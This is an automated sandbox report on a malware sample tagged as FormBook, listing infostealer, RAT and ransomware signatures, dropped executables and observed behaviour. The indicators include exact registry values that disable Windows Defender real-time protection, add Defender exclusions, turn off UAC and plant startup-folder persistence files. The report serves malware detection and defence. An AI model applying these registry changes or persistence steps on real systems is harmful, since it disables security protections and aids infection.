Malware Analysis Report

2024-07-11 10:12

Sample ID 240601-tcf1dsga81
Target Trojan;MSIL.FormBook.AFO!MTB.zip
SHA256 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Tags
amadey asyncrat lumma privateloader redline risepro targetcompany xworm 1 49e482 @logscloudyt_bot fresh bootkit collection discovery evasion execution infostealer loader persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Threat Level: Known bad

The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat lumma privateloader redline risepro targetcompany xworm 1 49e482 @logscloudyt_bot fresh bootkit collection discovery evasion execution infostealer loader persistence ransomware rat spyware stealer trojan

TargetCompany,Mallox

Lumma Stealer

Amadey

RisePro

RedLine

AsyncRat

PrivateLoader

Detect Xworm Payload

Modifies firewall policy service

Xworm

RedLine payload

UAC bypass

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (3581) files with added filename extension

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Reads user/profile data of local email clients

Identifies Wine through registry keys

Drops startup file

.NET Reactor proctector

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks BIOS information in registry

Windows security modification

Looks up external IP address via web service

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

outlook_win_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs ping.exe

Suspicious behavior: RenamesItself

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

System policy modification

Kills process with taskkill

GoLang User-Agent

outlook_office_path

Modifies system certificate store

Modifies registry class

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:54

Reported

2024-06-01 16:41

Platform

win10v2004-20240508-en

Max time kernel

226s

Max time network

404s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

TargetCompany,Mallox

ransomware targetcompany

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

Xworm

trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\lenin.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3581) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\lenin.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\lenin.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\mixinte.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\New.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\winlogon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\ADServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\ld.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Egt2KEDlnEDPcHbFceEZsAgS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster2663.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bAyFUgihOmry7UanLMPlSg0f.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UnWnb8fpIRuRuUDL2hrh8crR.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2663.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qBZ6zP2KgZdQaOhCd7LCnPnD.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jRT49afIpKbuIh72Jl4Dld3H.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J6M0PD9v12iBlUQzTRVA27yZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\Zinker.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ADServices.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\New.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\putty\putty.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\GTA_V.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\CapSimple.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\Desktop\a\RambledMimets.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\MSiedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\victor.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\RambledMime.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\current.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\host_so.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\mixinte.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\inte.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\winlogon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\buildjudit.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\33333.exe N/A
N/A N/A C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe N/A
N/A N/A C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\alex.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\well.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\Desktop\a\lenin.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\Desktop\a\random.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
